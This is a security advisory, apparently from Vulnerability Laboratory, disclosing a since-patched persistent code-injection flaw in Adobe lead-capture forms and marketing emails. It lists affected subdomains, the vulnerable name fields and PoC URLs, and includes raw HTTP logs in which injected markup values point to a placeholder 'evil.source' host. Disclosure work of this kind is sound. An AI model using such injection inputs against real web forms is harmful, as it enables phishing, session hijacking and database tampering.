--
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
[ reply ]
Privacy Statement
Copyright 2010, SecurityFocus
===============
Adobe Systems - Arbitrary Code Injection Vulnerability
References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2120
PSIRT ID: 7873
Vulnerability Magazine:
https://www.vulnerability-db.com/?q=articles/2018/07/19/hacker-injects-a
rbitrary-codes-main-lead-database-adobe-systems
Acknowledgements: (Industry Partners)
https://helpx.adobe.com/security/acknowledgements.html
Release Date:
=============
2018-07-19
Vulnerability Laboratory ID (VL-ID):
====================================
2120
Common Vulnerability Scoring System:
====================================
6.4
Vulnerability Class:
====================
Multiple
Current Estimated Price:
========================
5.000â?¬ - 10.000â?¬
Product & Service Introduction:
===============================
Adobe Systems Incorporated commonly known as Adobe, is an American
multinational computer software company.
The company is headquartered in San Jose, California, United States.
Adobe has historically focused upon the creation of
multimedia and creativity software products, with a more recent foray
towards rich Internet application software
development. It is best known for Photoshop, an image editing software,
Acrobat Reader, the Portable Document Format
(PDF), and Adobe Creative Suite, as well as its successor, Adobe
Creative Cloud.
(COpy of the Homepage: https://en.wikipedia.org/wiki/Adobe_Systems )
Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered arbitrary
code execution vulnerability in the Adobe Systems main lead database
management system.
Vulnerability Disclosure Timeline:
==================================
2018-02-05: Researcher Notification & Coordination (Security Researcher)
2018-02-08: Vendor Notification (Adobe PSIRT - Security Department)
2018-02-12: Vendor Response/Feedback (Adobe PSIRT - Security Department)
2018-02-16: Reporter Response/Feedback #1 (Security Researcher)
2018-02-27: Reporter Response/Feedback #2 (Security Researcher)
2018-03-04: Reporter Response/Feedback #3 (Security Researcher)
2018-06-14: Vendor Fix/Patch (Adobe Service Developer Team)
2018-06-15: Security Acknowledgements (Adobe PSIRT - Security Department)
2018-06-19: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
Adobe Systems
Product: Main Lead DBMS - *.adobesystems.com 2018 Q2
Exploitation Technique:
=======================
Remote
Severity Level:
===============
High
Authentication Type:
====================
Pre auth - no privileges
User Interaction:
=================
Low User Interaction
Disclosure Type:
================
Responsible Disclosure Program
Technical Details & Description:
================================
The vulnerability laboratory core research team discovered an arbitrary
code injection vulnerability in the adobe systems main lead database
management system.
The issue allows remote attackers to inject own malicious script codes
and system specific codes with persistent attack vector to the
application-side of
the vulnerable modules context or affected internal services.
The arbitrary code injection vulnerability is located in the external
services associated with the content of adobe systems subdomain services.
Attackers are able to attack the adobe system's lead database by
inserting arbitrary code over other database layers. This issue allows an
attacker to perform the injection using an external service form. After
the content has been delivered, the data is stored in the sub-service
database management system. Over time, the database contents of the sub
services are backed up and synchronized with the main database of the
adobe systems. In the case of our research, we identified several
external services to attack the sub-services of the adobe system and
finally
deliver the faulty content within the main lead database.
The injection points are the external services. The exeuction points are
located in the backend when processing to manage the contents and
when the content is delivered through the main lead database to other
customers or business clients (commercials, mailing and notify). The
vulnerable domain that executed the contents are adobesystems.com and
info.adobesystems.com. The request method to inject is POST and the
attack vector is located on the application-sideof adobe-systems. To
register and send an email no user account is required.
Successful exploitation of the arbitrary code injection vulnerability
results in malformed dbms injects, dbms compromise, session hijacking,
persistent phishing attacks, persistent external redirects to malicious
source and manipulation of affected or connected application modules.
Vulnerable Micro Service(s):
[+] apps.enterprise.adobe.com
[+] offflivestream.creativecloud.adobeevents.com/
[+] summit-emea.adobe.com
Vulnerable Sub Service(s):
[+] landing.adobe.com
[+] offers.adobe.com
[+]
sstats.adobe.com/b/ss/adbadobefaasprod,adbadobeglobalapp/1/JS-2.5.0/s311
8621512273
Request Method(s):
[+] POST
Vulnerable File(s):
[+] m.jsp
[+] adobe_econsultancy_digital_trends_2017.html
[+] submit.html
[+] form.html
Parameter(s):
[+] firstname
[+] lastname
[+] companyname
Affected Domain(s):
[+] adobe.com
[+] info.adobesystems.com
[+] t.info.adobesystems.com
[+] m.info.adobesystems.com
[+] t-info.mail.adobe.com
Proof of Concept (PoC):
=======================
The arbitrary code injection vulnerability can be exploited by remote
attackers without privileged user account and with low user interaction.
For security demonstration or to reproduce the vulnerability follow the
provided information and steps below to continue.
1. PoC: Injection Points External
https://apps.enterprise.adobe.com/faas/service/3.0.0/submit
https://offflivestream.creativecloud.adobeevents.com/register/registrati
on/form
https://summit-emea.adobe.com/emea/registration/?sdid=ZFN4FLWT&mv=email
2. PoC: Followed Sub Systems
http://landing.adobe.com/
https://offers.adobe.com/de/de/marketing/landings/digitale_trends_2017.h
tml
https://offers.adobe.com/de/de/marketing/offers/adobe_econsultancy_digit
al_trends_2017.html
http://t-info.mail.adobe.com/r/?id=t3100ff18,90990a66,90990bea
https://sstats.adobe.com/b/ss/adbadobefaasprod,adbadobeglobalapp/1/JS-2.
5.0/s3118621512273
3. PoC: Execution Points
https://www.adobe.com/de/modal-offers/how-to-data-to-customer-intelligen
ce.html
http://t.info.adobesystems.com//r/?id=h70201f92,8cea7339,8cea733a
http://t.info.adobesystems.com//r/?id=h70201f92,8cea7339,8cea7343&p1=%40
HeFLnKJ3LTguSxrRQIi3boBCMRBrTTbGPcHOK%2F%2BwiM4%3D
Note: The following example shows
1. Enterprise to stats adobe
2. After that occurs a sync to the sub domain service
3. Then the data is merged to the info adobe service
4. Some sync and backups later the content is inside the main lead database
--- PoC Session Logs (POST Inject)---
Status: 200[OK]
GET
https://apps.enterprise.adobe.com/faas/service/3.0.0/submit?callback=jQu
ery1102013829541567907688_1518951745795&id=1&l=3&d=%2Fcontent%2Fmicrosit
es%2Fadobe-offers%2Fde%2Fde%2Fmarketing%2Foffers%2Fadobe_econsultancy_di
gital_trends_2017.html&Form1%5B14%5D=822&Form1%5B15%5D=829&Form1%5B10%5D
=a%22%3E%3C+src%3Devil.source%3E%3C%3E&Form1%5B33%5D=https%3A%2F%2Fwww.t
est.de%2F%22%3E%3Crc%3Devil.source%3E%3C%3E&Form1%5B95%5D=2746&Form1%5B8
%5D=c%22%3E%3Csrc%3Devil.source%3E%3C%3E&Form1%5B9%5D=b%22%3E%3Csrc%3Dev
il.source%3E%3C%3E&Form1%5B1%5D=tester23%40evolutionsec.com&Form1%5B11%5
D=01925723572723&Form1%5B16%5D=31337&Form1%5B18%5D=462&Form1%5B19%5D=292
2&Form1%5B20%5D=72&Form1%5B130%5D=&Form1%5B35%5D=0&Form1%5B84%5D=0&Form1
%5B84%5D=1&Form1%5B85%5D=0&Form1%5B85%5D=1&Form1%5B87%5D=0&Form1%5B87%5D
=1&Form1%5B86%5D=0&Form1%5B77%5D=1&Form1%5B78%5D=1&Form1%5B79%5D=1&Form1
%5B80%5D=&Form1%5B89%5D=&Form1%5B6%5D=marketing_web_form&Form1%5B7%5D=wh
itepaper_form&Form1%5B31%5D=EXPERIENCEMANAGERSOLN&Form1%5B36%5D=70114000
002Cc8OAAS&Form1%5B37%5D=7011O000002Oq5lQAC&Form1%5B38%5D=&Form1%5B39%5D
=&Form1%5B40%5D=&Form1%5B44%5D=&Form1%5B45%5D=&Form1%5B46%5D=&Form1%5B47
%5D=&Form1%5B48%5D=&Form1%5B49%5D=&Form1%5B50%5D=&Form1%5B90%5D=DESBU&Fo
rm1%5B102%5D=&Form1%5B104%5D=&Form1%5B109%5D=EAIaIQobChMIxam646ev2QIV1sq
yCh352QaoEAMYAiAAEgLiEvD_BwE&Form1%5B115%5D=&Form1%5B116%5D=&Form1%5B122
%5D=&Form1%5B123%5D=&Form1%5B124%5D=&Form1%5B125%5D=&Form1%5B126%5D=&For
m1%5B127%5D=&Form1%5B128%5D=&Form1%5B129%5D=&Form1%5B120%5D=&ajax=faas-f
orm-1&_=1518951745799
Mime Type[application/json]
Request Header:
Host[apps.enterprise.adobe.com]
User-Agent[Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:56.0)
Gecko/20100101 Firefox/56.0]
Accept[*/*]
Referer[https://offers.adobe.com/de/de/marketing/landings/digitale_trend
s_2017.html?gclid=EAIaIQobChMIxam646ev2QIV1sqyCh352QaoEAMYAiAAEgLiEvD_Bw
E&s_cid=7011O000002Oq5lQAC&s_iid=70114000002Cc8OAAS&sdid=F4KHZX38&mv=sea
rch&edtamo=true&s_kwcid=AL!3085!3!250014124781!b!!g!!content-management-
system&ef_id=WoldPwAABEWVCpzB:20180218110223:s]
Cookie[AMCV_9E1005A551ED61CA0A490D45%40AdobeOrg=1406116232%7CMCIDTS%7C17
581%7CMCMID%7C70200303268859877472538284957896691642%7CMCAAMLH-151955654
7%7C6%7CMCAAMB-1519556547%7CRKhpRz8krg2tLO6pguXWp5olkAcUniQYPHaMWWgdJ3xz
PWQmdj0y%7CMCOPTOUT-1518958946s%7CNONE%7CMCAID%7C2D44AEA10530CAFD-400003
05C000F505%7CMCSYNCSOP%7C411-17588%7CvVersion%7C2.5.0;
s_pers=%20gpv%3Doffers.adobe.com%253Ade%253Amarketing%253Alandings%253Ad
igitale_trends_2017%7C1518953545956%3B%20s_nr%3D1518951745958-New%7C1550
487745958%3B%20TID%3D-F4KHZX38-%7C1529319749183%3B%20s_vs%3D1%7C15189537
26867%3B;
s_sess=%20s_a_campaign%3DF4KHZX38%3B%20s_ppv%3D%255B%2522offers.adobe.co
m%252Fde%252Fde%252Fmarketing%252Flandings%252Fdigitale_trends_2017.html
%2522%252C100%252C0%252C1118%252C1366%252C564%252C1366%252C768%252C1%252
C%2522P%2522%255D%3B%20s_cpc%3D1%3B%20s_cc%3Dtrue%3B%20s_sq%3Dadbadobeno
nacdcprod%253D%252526c.%252526a.%252526activitymap.%252526page%25253Doff
ers.adobe.com%2525253Ade%2525253Amarketing%2525253Alandings%2525253Adigi
tale_trends_2017%252526link%25253Dd2d1d3d2A1d1F2d22j1-Abschicken%252526r
egion%25253Dother%252526pageIDType%25253D1%252526.activitymap%252526.a%2
52526.c%2526adbadobefaasprod%25252Cadbadobeglobalapp%253D%252526c.%25252
6a.%252526activitymap.%252526page%25253Doffers.adobe.com%2525253Ade%2525
253Ade%2525253Amarketing%2525253Alandings%2525253Adigitale_trends_2017.h
tml%252526link%25253D1%252526region%25253Dfaas-form-1%252526pageIDType%2
5253D1%252526.activitymap%252526.a%252526.c%3B;
AWSALB=SbTNAUwD4VWBfGie5pg1LBkQ7ycVDw3Fzp27qOKDkJWVXWlsMBWc+ZWO6kN7yUrqg
gRU8u1gRwmDINdgNj0ugIUmSdwvQN0J9S2u3LeTlwIni2swslD5rm7Jgw+R;
PHPSESSID=ggu22jh4hpu53mpubl7udpmju3;
AMCVS_9E1005A551ED61CA0A490D45%40AdobeOrg=1; check=true;
s_vi=[CS]v1|2D44AEA10530CAFD-40000305C000F505[CE];
s_iid=70114000002Cc8OAAS; s_cid=7011O000002Oq5lQAC;
mbox=session#e0102d4d21d34f458792072e649f04fb#1518953608|PC#e0102d4d21d3
4f458792072e649f04fb.26_15#1582196548;
sfdc_session=-; TID=-F4KHZX38-; Fb-Syc=1; AAMC_adobe_0=REGION%7C6;
s_sq=adbadobefaasprod%252Cadbadobeglobalapp%3D%2526c.%2526a.%2526activit
ymap.%2526page%253Doffers.adobe.com%25253Ade%25253Ade%25253Amarketing%25
253Alandings%25253Adigitale_trends_2017.html%2526link%253DAbschicken%252
6region%253Dfaas-form-1%2526pageIDType%253D1%2526.activitymap%2526.a%252
6.c]
Connection[keep-alive]
Response Header:
content-type[application/json; charset=UTF-8]
content-length[445]
server[Apache]
expires[Thu, 19 Nov 1981 08:52:00 GMT]
cache-control[no-store, no-cache, must-revalidate, post-check=0,
pre-check=0]
pragma[no-cache]
access-control-allow-origin[*]
set-cookie[AWSALB=A3qFidf0O5y8FJMPYy8yPurGXw6U0pm1vsgi9RZbDaOZjkaQdp9cdZ
ICl9KMU2yldLT8dDmkmf0oheGoizsb/x4D/1If/GfJZbDXNeZi0pkdbeLLupJo4azCKowa;
Expires=Sun, 25 Feb 2018 11:05:26 GMT; Path=/
faas_form_1_hash=ff01e8531641c6ec1bcec21c031b44eb; expires=Tue,
20-Mar-2018 11:05:28 GMT; path=/; domain=adobe.com; secure
faas_form_1_hash=ff01e8531641c6ec1bcec21c031b44eb; expires=Tue,
20-Mar-2018 11:05:28 GMT; path=/; domain=offers.adobe.com; secure
faas_form_1_hash=ff01e8531641c6ec1bcec21c031b44eb; expires=Tue,
20-Mar-2018 11:05:28 GMT; path=/; domain=apps.enterprise.adobe.com; secure
faas_form_1_status=completed; expires=Tue, 20-Mar-2018 11:05:28 GMT;
path=/; domain=adobe.com; secure
faas_form_1_status=completed; expires=Tue, 20-Mar-2018 11:05:28 GMT;
path=/; domain=offers.adobe.com; secure
faas_form_1_status=completed; expires=Tue, 20-Mar-2018 11:05:28 GMT;
path=/; domain=apps.enterprise.adobe.com; secure
s_iid=70114000002Cc8OAAS; expires=Tue, 20-Mar-2018 11:05:28 GMT; path=/;
domain=adobe.com; secure
s_iid=70114000002Cc8OAAS; expires=Tue, 20-Mar-2018 11:05:28 GMT; path=/;
domain=offers.adobe.com; secure
s_iid=70114000002Cc8OAAS; expires=Tue, 20-Mar-2018 11:05:28 GMT; path=/;
domain=apps.enterprise.adobe.com; secure
s_cid=7011O000002Oq5lQAC; expires=Tue, 20-Mar-2018 11:05:28 GMT; path=/;
domain=adobe.com; secure
s_cid=7011O000002Oq5lQAC; expires=Tue, 20-Mar-2018 11:05:28 GMT; path=/;
domain=offers.adobe.com; secure
s_cid=7011O000002Oq5lQAC; expires=Tue, 20-Mar-2018 11:05:28 GMT; path=/;
domain=apps.enterprise.adobe.com; secure]
X-Firefox-Spdy[h2]
-
Status: 200[OK]
POST
https://sstats.adobe.com/b/ss/adbadobefaasprod,adbadobeglobalapp/1/JS-2.
5.0/s3118621512273
Mime Type[image/gif]
Request Header:
Host[sstats.adobe.com]
User-Agent[Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:56.0)
Gecko/20100101 Firefox/56.0]
Accept[*/*]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate, br]
Referer[https://offers.adobe.com/de/de/marketing/landings/digitale_trend
s_2017.html?gclid=EAIaIQobChMIxam646ev2QIV1sqyCh352QaoEAMYAiAAEgLiEvD_Bw
E&s_cid=7011O000002Oq5lQAC&s_iid=70114000002Cc8OAAS&sdid=F4KHZX38
&mv=search&edtamo=true&s_kwcid=AL!3085!3!250014124781!b!!g!!content-mana
gement-system&ef_id=WoldPwAABEWVCpzB:20180218110223:s]
Content-Length[2181]
Content-Type[text/plain;charset=UTF-8]
Origin[https://offers.adobe.com]
DNT[1]
Connection[keep-alive]
POST-Daten:
AQB[1]
ndh[1]
pf[1]
t[18%2F1%2F2018%2012%3A5%3A28%200%20-60]
mid[70200303268859877472538284957896691642]
aid[2D44AEA10530CAFD-40000305C000F505]
aamlh[6]
ce[UTF-8]
cdp[2]
fpCookieDomainPeriods[2]
pageName[faaswc%3AFaaS%20Form%20Submission]
g[https%3A%2F%2Foffers.adobe.com%2Fde%2Fde%2Fmarketing%2Flandings%2Fdigi
tale_trends_2017.html%3Fgclid%3D
EAIaIQobChMIxam646ev2QIV1sqyCh352QaoEAMYAiAAEgLiEvD_BwE%26s_cid%3D7011O0
00002Oq5lQAC%26s_iid%3D
70114000002Cc8OAAS%26sdid%3DF4KHZX38%26mv%3Dsearch%26edtamo%3Dtrue%26s_k
wcid%3DAL%213085%213%21250014124781%21]
c.[]
adb.[]
app.[]
name[1]
namespace[faaswc]
category[webComponent]
version[3.0.0]
.app[]
state.[]
location[https%3A%2F%2Foffers.adobe.com%2Fde%2Fde%2Fmarketing%2Flandings
%2Fdigitale_trends_2017.html
%3Fgclid%3DEAIaIQobChMIxam646ev2QIV1sqyCh352QaoEAMYAiAAEgLiEvD_BwE%26s_c
id%3D7011O000002Oq5lQAC%26s_iid%3D
70114000002Cc8OAAS%26sdid%3DF4KHZX38%26mv%3Dsearch%26edtamo%3Dtrue%26s_k
wcid%3DAL%213085%213%21250014124781
%21b%21%21g%21%21content-management-system%26ef_id%3DWoldPwAABEWVCpzB%3A
20180218110223%3As]
.state[]
.adb[]
faaswc.[]
form.[]
id[1]
.form[]
.faaswc[]
.c[]
aamb[RKhpRz8krg2tLO6pguXWp5olkAcUniQYPHaMWWgdJ3xzPWQmdj0y]
c36[unspecified]
c37[https%3A%2F%2Foffers.adobe.com%2Fde%2Fde%2Fmarketing%2Flandings%2Fdi
gitale_trends_2017.html%3Fgclid%3
DEAIaIQobChMIxam646ev2QIV1sqyCh352QaoEAMYAiAAEgLiEvD_BwE%26s_cid%3D7011O
000002Oq5lQAC%26s_iid%3D70114000002Cc8O
AAS%26sdid%3DF4KHZX38%26mv%3Dsearch%26edtamo%3Dtrue%26s_kwcid%3DAL%21308
5%213%21250014124781%21b%21%21g%21%21
content-management-system%26ef_id%3DWoldPwAABEWVCpzB%3A20180218110223%3A
s]
c38[form_1]
c39[linked_in%7Cjs%7Cfaas_submission%7Csfdc%7Cdemandbase]
c42[%2Fcontent%2Fmicrosites%2Fadobe-offers%2Fde%2Fde%2Fmarketing%2Foffer
s
%2Fadobe_econsultancy_digital_trends_2017.html%3Ffaas_unique_submission_
id%3D78D1E035-F1C6-4261-4EA0-C82041EB2A11]
a.[]
activitymap.[]
page[offers.adobe.com%3Ade%3Ade%3Amarketing%3Alandings%3Adigitale_trends
_2017.html]
link[Abschicken]
region[faas-form-1]
pageIDType[1]
.activitymap[]
.a[]
s[1366x768]
c[24]
j[1.8.5]
v[N]
k[Y]
bw[1366]
bh[564]
-g[b%21%21g%21%21content-management-system%26ef_id%3DWoldPwAABEWVCpzB%3A
20180218110223%3As]
mcorgid[9E1005A551ED61CA0A490D45%40AdobeOrg]
AQE[1]
Response Header:
Server[Omniture DC/2.0.0]
Access-Control-Allow-Origin[*]
X-C[ms-5.6.0]
Expires[Sat, 17 Feb 2018 11:05:28 GMT]
Last-Modified[Mon, 19 Feb 2018 11:05:28 GMT]
Cache-Control[no-cache, no-store, max-age=0, no-transform, private]
Pragma[no-cache]
ETag["5A895DF8-FEF7-4E72B58E"]
Vary[*]
P3P[CP="This is not a P3P policy"]
xserver[www56]
Content-Length[43]
Keep-Alive[timeout=15]
Connection[Keep-Alive]
Content-Type[image/gif]
-
Status: 200[OK]
GET
https://sstats.adobe.com/b/ss/adbadobenonacdcprod/10/JS-2.5.0-D7QN/s3863
3784893508?AQB=1&ndh=1&pf=1&callback=s_c_il[1].doPostbacks&et=1&t=18%2F1
%2F2018%2012%3A5%3A28%200%20-60&cid.&email_hash.&id=ff01e8531641c6ec1bce
c21c031b44eb&as=1&.email_hash&faas_unique_submission_id.&id=78D1E035-F1C
6-4261-4EA0-C82041EB2A11&as=1&.faas_unique_submission_id&.cid&d.&nsid=0&
jsonv=1&.d&D=D%3D&mid=70200303268859877472538284957896691642&aid=2D44AEA
10530CAFD-40000305C000F505&aamlh=6&ce=UTF-8&cdp=2&fpCookieDomainPeriods=
2&pageName=offers.adobe.com%3Ade%3Amarketing%3Alandings%3Adigitale_trend
s_2017&g=https%3A%2F%2Foffers.adobe.com%2Fde%2Fde%2Fmarketing%2Flandings
%2Fdigitale_trends_2017.html%3Fgclid%3DEAIaIQobChMIxam646ev2QIV1sqyCh352
QaoEAMYAiAAEgLiEvD_BwE%26s_cid%3D7011O000002Oq5lQAC%26s_iid%3D7011400000
2Cc8OAAS%26sdid%3DF4KHZX38%26mv%3Dsearch%26edtamo%3Dtrue%26s_kwcid%3DAL%
213085%213%21250014124781%21&events=event109&v28=offers.adobe.com%2Fde%2
Fde%2Fmarketing%2Flandings%2Fdigitale_trends_2017.html&v69=offers.adobe.
com%3Ade%3Amarketing%3Alandings%3Adigitale_trends_2017&v87=462&v88=72&v1
16=1&v147=78D1E035-F1C6-4261-4EA0-C82041EB2A11&v148=ff01e8531641c6ec1bce
c21c031b44eb&pe=lnk_o&pev2=FaaS%20Form%20Submission&c.&a.&activitymap.&p
age=offers.adobe.com%3Ade%3Amarketing%3Alandings%3Adigitale_trends_2017&
link=d2d1d3d2A1d1F2d22j1-Abschicken®ion=other&pageIDType=1&.activitym
ap&.a&.c&-g=b%21%21g%21%21content-management-system%26ef_id%3DWoldPwAABE
WVCpzB%3A20180218110223%3As&mcorgid=9E1005A551ED61CA0A490D45%40AdobeOrg&
AQE=1
Mime Type[application/x-javascript]
Request Header:
Host[sstats.adobe.com]
User-Agent[Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:56.0)
Gecko/20100101 Firefox/56.0]
Accept[*/*]
Referer[https://offers.adobe.com/de/de/marketing/landings/digitale_trend
s_2017.html?gclid=EAIaIQobChMIxam646ev2QIV1sqyCh352QaoEAMYAiAAEgLiEvD_Bw
E&s_cid=7011O000002Oq5lQAC&s_iid=70114000002Cc8OAAS&sdid=F4KHZX38&mv=sea
rch&edtamo=true&s_kwcid=AL!3085!3!250014124781!b!!g!!content-management-
system&ef_id=WoldPwAABEWVCpzB:20180218110223:s]
Cookie[AMCV_9E1005A551ED61CA0A490D45%40AdobeOrg=1406116232%7CMCIDTS%7C17
581%7CMCMID%7C70200303268859877472538284957896691642%7CMCAAMLH-151955654
7%7C6%7CMCAAMB-1519556547%7CRKhpRz8krg2tLO6pguXWp5olkAcUniQYPHaMWWgdJ3xz
PWQmdj0y%7CMCOPTOUT-1518958946s%7CNONE%7CMCAID%7C2D44AEA10530CAFD-400003
05C000F505%7CMCSYNCSOP%7C411-17588%7CvVersion%7C2.5.0;
s_pers=%20gpv%3Doffers.adobe.com%253Ade%253Amarketing%253Alandings%253Ad
igitale_trends_2017%7C1518953545956%3B%20s_nr%3D1518951745958-New%7C1550
487745958%3B%20TID%3D-F4KHZX38-%7C1529319749183%3B%20s_vs%3D1%7C15189537
28730%3B;
s_sess=%20s_a_campaign%3DF4KHZX38%3B%20s_ppv%3D%255B%2522offers.adobe.co
m%252Fde%252Fde%252Fmarketing%252Flandings%252Fdigitale_trends_2017.html
%2522%252C100%252C0%252C1118%252C1366%252C564%252C1366%252C768%252C1%252
C%2522P%2522%255D%3B%20s_cpc%3D1%3B%20s_cc%3Dtrue%3B%20s_sq%3Dadbadobefa
asprod%25252Cadbadobeglobalapp%253D%252526c.%252526a.%252526activitymap.
%252526page%25253Doffers.adobe.com%2525253Ade%2525253Ade%2525253Amarketi
ng%2525253Alandings%2525253Adigitale_trends_2017.html%252526link%25253D1
%252526region%25253Dfaas-form-1%252526pageIDType%25253D1%252526.activity
map%252526.a%252526.c%3B;
AMCVS_9E1005A551ED61CA0A490D45%40AdobeOrg=1; check=true;
s_vi=[CS]v1|2D44AEA10530CAFD-40000305C000F505[CE];
s_iid=70114000002Cc8OAAS; s_cid=7011O000002Oq5lQAC;
mbox=session#e0102d4d21d34f458792072e649f04fb#1518953608|PC#e0102d4d21d3
4f458792072e649f04fb.26_15#1582196548;
sfdc_session=-; TID=-F4KHZX38-; Fb-Syc=1; AAMC_adobe_0=REGION%7C6;
s_sq=%5B%5BB%5D%5D; faas_form_1_hash=ff01e8531641c6ec1bcec21c031b44eb;
faas_form_1_status=completed]
Connection[keep-alive]
Response Header:
Server[Omniture DC/2.0.0]
Access-Control-Allow-Origin[*]
X-C[ms-5.6.0]
ETag["5A895DF8-68DE-70672227"]
Vary[*]
P3P[CP="This is not a P3P policy"]
xserver[www28]
Content-Length[6393]
Keep-Alive[timeout=15]
Connection[Keep-Alive]
Content-Type[application/x-javascript]
Vulnerable Source: Service Email #1 (Test)
<tbody><tr><td class="mobile-spacer" style="width:60px;"
width="60"> </td>
<td class="headline" style="color:#2F303D; font-family:serenity,
Helvetica Neue,
Helvetica, Verdana, Arial, sans-serif; font-size:30px; line-height:25px;
padding-top:40px;"
align="center"><strong>RAGEN SIE HERAUS MIT GROSSARTIGEN
ERLEBNISSEN.</strong></td>
<td class="mobile-spacer" style="width:60px;" width="60"> </td></tr>
<tr><td class="mobile-spacer" style="width:60px;" width="60"> </td>
<td style="color:#2F303D; font-family:adobe-clean, Helvetica Neue Light,
Helvetica Light,
Helvetica, Verdana, Arial, sans-serif; font-size:16px; font-weight:100;
line-height:19px; padding-top:12px;"
align="center">Sehr geehrter Herr "<[PAYLOAD EXECUTION POINT FIRSTNAME &
LASTNAME])" <,<br=""><br>das
Erlebnis wächst sich gerade zum wichtigsten Faktor bei der
Kundenbindung aus. Erlebnisse, die persönlich,
begeisternd und konsistent auf jedem Kanal und Endgerät sind ââ?¬â??
das ist jetzt Ihr gröÃ?Ÿter Wettbewerbsvorteil.
<br><br>Besuchen Sie unseren Adobe Summit EMEA 2018. Erleben Sie bei
uns, was es für auÃ?Ÿergewöhnliche
digitale Erlebnisse wirklich braucht. Erfahren Sie von Unternehmen wie
<strong>Sky, DHL</strong> oder
<strong>Raiffeisen</strong>, wie sie diese neuartigen Erlebnis-Angebote
realisiert haben, die ihre Geschäftsmodelle
heute bereits von der Konkurrenz abheben.
Vulnerable Source: Service Email #2 (Test)
<td class="mobile" style="display: none; max-height:0; font-size:0;
height:0;padding:0;margin:0;width:0;" valign="top">
<a
href="http://t.info.adobesystems.com//r/?id=h545ac15,8dd8df42,8dd8df46&a
mp;p1=7011O000002bSn9QAE&p2=0031400002mfNt5AAE"
target="_blank" style="color:#0099ff;"><img class="mobile-image"
alt="Weil wir innovativ bleiben, liegen wir weiterhin vorne."
src="https://www.adobe.com/content/dam/acom/fr/solutions/digital-marketi
ng/events/images/other/49460e.de.because-we-keep-innovating-we-keep-lead
ing.640x597.jpg"
style="vertical-align:top;
overflow:hidden;display:none;visibility:hidden;width:0;max-height:0;"
width="320" vspace="0" hspace="0" height="340" border="0">
</a>
</td>
<!--<![endif]-->
</tr>
</tbody></table>
</td>
</tr>
<tr>
<td class="mobile-padding"
style="padding-left:30px;padding-right:30px;padding-top:14px;"
valign="top" bgcolor="#000000">
<table style="mso-cellspacing: 0px; mso-padding-alt: 0px 0px 0px 0px;
width:100%;" width="100%" cellspacing="0" cellpadding="0" border="0">
<tbody><tr>
<td class="mobile-text" style="color:#ffffff; font-family:Arial,
Helvetica, sans-serif; font-size:12px; line-height:18px;
padding-top:12px;" valign="top">
Sehr geehrter Herr "%20"[PAYLOAD EXECUTION POINT FIRSTNAME &
LASTNAME],<br=""><br>Forrester stuft Adobe als Leader bei Web-Analysen ein.
Lesen Sie in <i>The Forrester Wave<sup
style="line-height:95%;">ââ??¢</sup>: Web Analytics, Q4 2017</i>, weshalb
wir weiter den Ton angeben
ââ?¬â?? mit aussagekrÃ?¤ftigen und verwertbaren Einblicken fÃ?¼r alle
Mitarbeiter im Unternehmen.
</tr>
Reference(s):
https://www.adobe.com
http://t.info.adobesystems.com
http://m.info.adobesystems.com
https://offers.adobe.com
https://sstats.adobe.com
https://apps.enterprise.adobe.com
http://landing.adobe.com
http://t-info.mail.adobe.com
https://offflivestream.creativecloud.adobeevents.com
https://summit-emea.adobe.com
Solution - Fix & Patch:
=======================
1. Restrict and filter the input fields and disallow usage of script
code tags for inputs
2. Encode the context of the input fields during the post method request
submit to prevent malformed injects
3. Parse the firstname and lastname and company values in outgoing
emails with all adobe service templates
4. Implement a filter mechanism with exception-handling to parse
contents delivered from an external service to the sub-service followed
by the main lead database
5. Provide awareness to employees by explaining the specific impact of
the attack points to prevent the manual delivery
6. Develop a process to remove compromised information from the main
database or backups
7. Ensure that a web-firewall captures those incidents to alert or react
to ensure that an attacker is not able to move through the separate
database segments
The reported urls has been reported and disarmed already by the adobe
systems psirt and developer team. The issue has been patched in multiple
functions.
The forumulars are already restricted and the case scenario has been
full transparent delivered to ensure the problematic becomes visible to
adobe.
(Example:
http://t.info.adobesystems.com//r/?id=h70201f92,8cea7339,8cea7343&p1=%40
HeFLnKJ3LTguSxrRQIi3boBCMRBrTTbGPcHOK%2F%2BwiM4%3D)
Security Risk:
==============
The security risk of the arbitrary code injection vulnerability in the
adobe web services are estimated as high.
Credits & Authors:
==================
Benjamin K.M. (Vulnerability Laboratory Core Research
Team)[research (at) vulnerability-lab (dot) com [email concealed]] -
https://www.vulnerability-lab.com/show.php?user=Benjamin+K.M.
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without
any warranty. Vulnerability Lab disclaims all warranties, either
expressed or
implied, including the warranties of merchantability and capability for
a particular purpose. Vulnerability-Lab or its suppliers are not liable
in any
case of damage, including direct, indirect, incidental, consequential
loss of business profits or special damages, even if Vulnerability Labs
or its
suppliers have been advised of the possibility of such damages. Some
states do not allow the exclusion or limitation of liability mainly for
incidental
or consequential damages so the foregoing limitation may not apply. We
do not approve or encourage anybody to break any licenses, policies, deface
websites, hack into databases or trade with stolen data. We have no need
for criminal activities or membership requests. We do not publish
advisories
or vulnerabilities of religious-, militant- and racist-
hacker/analyst/researcher groups or individuals. We do not publish trade
researcher mails,
phone numbers, conversations or anything else to journalists,
investigative authorities or private individuals.
Domains: www.vulnerability-lab.com - www.vulnerability-db.com -
www.evolution-sec.com
Programs: vulnerability-lab.com/submit.php -
vulnerability-lab.com/list-of-bug-bounty-programs.php -
vulnerability-lab.com/register.php
Feeds: vulnerability-lab.com/rss/rss.php -
vulnerability-lab.com/rss/rss_upcoming.php -
vulnerability-lab.com/rss/rss_news.php
Social: twitter.com/vuln_lab - facebook.com/VulnerabilityLab -
youtube.com/user/vulnerability0lab
Any modified copy or reproduction, including partially usages, of this
file, resources or information requires authorization from Vulnerability
Laboratory.
Permission to electronically redistribute this alert in its unmodified
form is granted. All other rights, including the use of other media, are
reserved by
Vulnerability Lab Research Team or its suppliers. All pictures, texts,
advisories, source code, videos and other information on this website is
trademark
of vulnerability-lab team & the specific authors or managers. To record,
list, modify, use or edit our material contact (admin@) to get an ask
permission.
Copyright © 2018 | Vulnerability Laboratory - [Evolution
Security GmbH]â?¢
--
